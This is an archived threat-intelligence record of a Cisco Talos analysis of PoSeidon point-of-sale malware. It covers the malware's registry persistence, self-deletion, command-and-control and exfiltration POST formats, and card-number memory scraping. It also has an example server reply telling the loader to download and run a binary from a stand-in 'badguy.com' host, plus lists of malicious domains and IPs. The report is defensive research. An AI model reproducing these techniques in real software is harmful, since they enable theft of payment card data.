{
	"id": "cc76c8d5-7552-4803-ba8d-83c4381c1b90",
	"created_at": "2026-04-06T00:12:20.326108Z",
	"updated_at": "2026-04-10T03:20:33.93537Z",
	"deleted_at": null,
	"sha1_hash": "a7459517ddb9cbfe198a990598647718539a25b9",
	"title": "Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2078351,
	"plain_text": "Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale\r\nMalware\r\nBy Talos Group,\r\nPublished: 2015-03-20 · Archived: 2026-04-05 20:19:52 UTC\r\nThis post was authored by Andrea Allievi, Ben Baker, Nick Biasini, JJ Cummings, Douglas Goddard, William\r\nLargent, Angel Villegas, and Alain Zidouemba\r\nCisco’s Security Solutions (CSS) consists of information security experts with a unique blend of law enforcement,\r\nenterprise security and technology security backgrounds. The team works directly with Cisco’s Talos Security\r\nIntelligence \u0026 Research Group to identify known and unknown threats, quantify and prioritize risk, and minimize\r\nfuture risk.\r\nWhen consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS)\r\nsystems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic\r\nstripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a\r\nmagnetic stripe and used with a new card. Criminal markets exist for this valuable information because the\r\nattackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the\r\nrise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of\r\nmedia attention. The presence of large amounts of financial and personal information ensures that these companies\r\nand their retail PoS systems will remain attractive targets.\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 1 of 12\n\nOverview\r\nThere is a new malware family targeting PoS systems, infecting machines to scrape memory for credit card\r\ninformation and exfiltrate that data to servers, also primarily .ru TLD, for harvesting and likely resale. This new\r\nmalware family, that we’ve nicknamed PoSeidon, has a few components to it, as illustrated by the diagram below:\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 2 of 12\n\nAt a high level, it starts with a Loader binary that upon being executed will first try to maintain persistence on the\r\ntarget machine in order to survive a possible system reboot. The Loader then contacts a command and control\r\nserver, retrieving a URL which contains another binary to download and execute. The downloaded binary,\r\nFindStr, installs a keylogger and scans the memory of the PoS device for number sequences that could be credit\r\ncard numbers. Upon verifying that the numbers are in fact credit card numbers, keystrokes and credit card\r\nnumbers are encoded and sent to an exfiltration server.\r\nTechnical details\r\nKeylogger\r\nThe file with SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 could perhaps\r\nbe at the source of the PoS system compromise. We call this file KeyLogger based on debugging information\r\nfound in the binary:\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 3 of 12\n\nUpon execution, this file copies itself to either %SystemRoot%\\system32\\\u003cfilename\u003e.exe or %UserProfile%\\\r\n\u003cfilename\u003e.exe and adds registry entry under HKLM (or\r\nHKCU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nThe file also opens HKCU\\Software\\LogMeIn Ignition and enumerates the keys for the account sub key, opens it\r\nand deletes the PasswordTicket Value and obtains the Email Value. Also deletes registry tree\r\nHKCU\\Software\\LogMeIn Ignition\\\u003ckey\u003e\\Profiles\\* .\r\nThe file sends to an exfiltration server by POSTing data to one of these URIs:\r\nwondertechmy[.]com/pes/viewtopic.php\r\nwondertechmy[.]ru/pes/viewtopic.php\r\nwondwondnew[.]ru/pes/viewtopic.php\r\n The URI format is\r\nuid=%I64u\u0026win=%d.%d\u0026vers=%s\r\nThe Keylogger component was potentially used to steal passwords and could have been the initial infection vector.\r\nLoader\r\nThe loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:\r\nUpon being run, Loader checks to see if it’s being executed with one of these two file names:\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 4 of 12\n\nWinHost.exe\r\nWinHost32.exe\r\nIf it is not, it will make sure that no Windows service is running with the name WinHost. Loader will copy itself to\r\n%SystemRoot%\\System32\\WinHost.exe, overwriting any file in that location that would happen to have the same\r\nname. Next, Loader will start a service named WinHost.\r\nThis is done so that it remains running in memory even if the current user logs off. If Loader is not able to install\r\nitself as a service, it will try to find other instances of itself running in memory and terminate them. Subsequently,\r\nit will copy itself to %UserProfile%\\WinHost32.exe and install the registry key\r\nHKCU\\Microsoft\\Windows\\CurrentVersion\\Run\\\\WinHost32. Finally, it will create a new process to execute\r\n%UserProfile%\\WinHost32.exe.\r\nNow that persistence has been achieved, Loader will delete itself by running the following command:\r\ncmd.exe /c del \u003cpath_to_itself\u003e \u003e\u003e NUL\r\nThe instance of Loader running in memory attempt to read configuration data at\r\n%SystemRoot%\\System32\\WinHost.exe.cfg. This file can hold a list of URLs to be added to a list of hardcoded\r\nURLs already contained in Loader.\r\nLoader then attempts to contact one of the hardcoded C\u0026C server:\r\nlinturefa.com\r\nxablopefgr.com\r\ntabidzuwek.com\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 5 of 12\n\nlacdileftre.ru\r\ntabidzuwek.com\r\nxablopefgr.com\r\nlacdileftre.ru\r\nweksrubaz.ru\r\nlinturefa.ru\r\nmifastubiv.ru\r\nxablopefgr.ru\r\ntabidzuwek.ru\r\nAssociated IP Addresses:\r\n151.236.11.167\r\n185.13.32.132\r\n185.13.32.48\r\nREDACTED at request of Federal Law Enforcement\r\n31.184.192.196\r\n91.220.131.116\r\n91.220.131.87\r\nIf one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent\r\nstring:\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR\r\n3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nPOST data is sent to either:\r\n\u003cIP ADDRESS\u003e/ldl01/viewtopic.php\r\n\u003cIP ADDRESS\u003e/pes2/viewtopic.php\r\nPOST data follows the format:\r\nuid=%I64u\u0026uinfo=%s\u0026win=%d.%d\u0026bits=%d\u0026vers=%s\u0026build=%s\r\nLoader expects the following response from the C\u0026C server:\r\n{\u003cCommandLetter\u003e:\u003cArgumentString\u003e}\r\nExample response:\r\n{R:http://badguy.com/malwarefilename.exe}\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 6 of 12\n\n{b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}\r\nIt’s by fetching and executing the executable referenced in the server response that the second part of PoSeidon\r\nfinds its way to the PoS device.\r\nFindStr\r\nThe loader for the PoSeidon PoS malware gets its name from debugging information found in the binary:\r\nAn embedded PE is extracted through shellcode and execution continues with the embedded binary. This file\r\ninstalls a minimal keylogger that is implemented similarly to the description found here. The data intercepted by\r\nthis keylogger will later be sent to an exfiltration server.\r\nThe PE then cycles through all running processes on the PoS device to look for processes with a security token\r\nnot associated with the “NT AUTHORITY” domain name. It iterates through all read/write pages within those\r\nprocesses for credit card info.\r\nThe malware only looks for number sequences that start with:\r\n6, 5, 4 with a length of 16 digits (Discover, Visa, Mastercard)\r\n3 with a length of 15 digits (AMEX)\r\nIt then uses the Luhn algorithm to verify that the numbers are actually credit or debit card numbers as shown by\r\nthe code segment below:\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 7 of 12\n\nNext, DNS resolution is attempted for the domains below. These are some of the known data exfiltration servers:\r\nquartlet.com\r\nhorticartf.com\r\nkilaxuntf.ru\r\ndreplicag.ru\r\nfimzusoln.ru\r\nwetguqan.ru\r\nIf one of the domains above resolve to an IP address an HTTP POST is made using the following user-agent\r\nstring:\r\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR\r\n3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nPOST data is sent to:\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 8 of 12\n\n\u003cIP ADDRESS\u003e/pes13/viewtopic.php\r\nData follows the following format:\r\noprat=2\u0026uid=%I64u\u0026uinfo=%s\u0026win=%d.%d\u0026vers=%s\r\noptional POST data (data: credit card numbers, logs: keylogger data)\r\n\u0026data=\u003cXORed_with_0x2A_then_base64_data_unk\u003e\r\n\u0026logs=\u003cXORed_with_0x2A_then_base64_data_unk\u003e\r\nCredit card numbers and keylogger data is sent to the exfiltration server after being XORed and base64 encoded.\r\nThe expect response from the exfiltration server is:\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 9 of 12\n\nThis mechanism allows for the the malware to update itself, based on commands received from the exfiltration\r\nserver.\r\nLoader vs FindStr\r\nComparing an unpacked copy of Loader version 11.4  to an unpacked copy of FindStr version 7.1 with Bindiff\r\nshows that 62% of the functionality in both samples is the same. The actors behind this malware probably\r\ndeveloped some core functionality and compiled it into a library to be used by other projects they are developing.\r\n IOC\r\nClick for Endpoint IOC Version\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 10 of 12\n\nWin.Trojan.PoSeidon.RegistryItem.ioc\r\nWin.Trojan.PoSeidon.ProcessItem.ioc\r\nWin.Trojan.PoSeidon.FileItem.ioc\r\nDomains\r\nlinturefa.com\r\nxablopefgr.com\r\ntabidzuwek.com\r\nlinturefa.ru\r\nxablopefgr.ru\r\ntabidzuwek.ru\r\nweksrubaz.ru\r\nmifastubiv.ru\r\nlacdileftre.ru\r\nquartlet.com\r\nhorticartf.com\r\nkilaxuntf.ru\r\ndreplicag.ru\r\nfimzusoln.ru\r\nwetguqan.ru\r\n IP Addresses:\r\n151.236.11.167\r\n185.13.32.132\r\n185.13.32.48\r\nREDACTED at request of Federal Law Enforcement\r\n31.184.192.196\r\n91.220.131.116\r\n91.220.131.87\r\nREDACTED at request of Federal Law Enforcement\r\nConclusion\r\nPoSeidon is another in the growing number of Point-of-Sale malware targeting PoS systems that demonstrate the\r\nsophisticated  techniques and approaches of malware authors. Attackers will continue to target PoS systems and\r\nemploy various obfuscation techniques in an attempt to avoid detection. As long as PoS attacks continue to\r\nprovide returns, attackers will continue to invest in innovation and development of new malware families.\r\nNetwork administrators will need to remain vigilant and adhere to industry best practices to ensure coverage and\r\nprotection against advancing malware threats.\r\nSnort Rules: 33836-33852. Please refer to Defense Center or FIREsight management console for updated\r\ninformation.\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 11 of 12\n\nProtecting Users from These Threats\r\nWe encourage organizations to consider security best practices, starting with a threat-centric approach. Given the\r\ndynamic threat landscape, we advocate this threat-centric and operationalized approach that implements\r\nprotections across the extended network – and across the full attack continuum – before, during, and after an\r\nattack. This approach is predicated upon superior visibility, continuous control, and advanced threat protection\r\nacross the extended network and the entire attack continuum\r\nSource: https://blogs.cisco.com/security/talos/poseidon\r\nhttps://blogs.cisco.com/security/talos/poseidon\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blogs.cisco.com/security/talos/poseidon"
	],
	"report_names": [
		"poseidon"
	],
	"threat_actors": [],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a7459517ddb9cbfe198a990598647718539a25b9.pdf",
		"text": "https://archive.orkl.eu/a7459517ddb9cbfe198a990598647718539a25b9.txt",
		"img": "https://archive.orkl.eu/a7459517ddb9cbfe198a990598647718539a25b9.jpg"
	}
}